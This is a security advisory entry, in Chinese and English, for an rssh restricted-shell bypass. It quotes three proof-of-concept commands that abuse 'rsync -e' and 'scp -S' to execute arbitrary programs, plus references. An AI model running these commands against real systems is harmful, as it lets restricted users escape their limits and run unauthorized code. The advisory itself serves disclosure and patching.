https://www.exploit-db.com/exploits/24795
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-072

rssh是一款shell，可以帮助系统管理员为特定用户提供通过scp和sftp登陆某系统的权限。rssh2.2.2及之前版本存在绕过安全限制漏洞。由于没有适当的限制可以运行的程序，远程认证用户可通过rdist-P、rsync或scp-S，绕过安全限制，执行任意程序。

source: http://www.securityfocus.com/bid/11792/info

rssh is reported prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer.

All versions of rssh are considered vulnerable at the moment.

ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp' 

scp command.sh restricteduser@remotehost:/tmp/command.sh 

ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'

来源:GENTOO
名称:GLSA-200412-01
链接:http://www.gentoo.org/security/en/glsa/glsa-200412-01.xml
来源:BID
名称:11792
链接:http://www.securityfocus.com/bid/11792
来源:BUGTRAQ
名称:20041202rsshandscponlyarbitrarycommandexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110202047507273&w;=2
来源:BUGTRAQ
名称:20050115Re:rsshandscponlyarbitrarycommandexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110581113814623&w;=2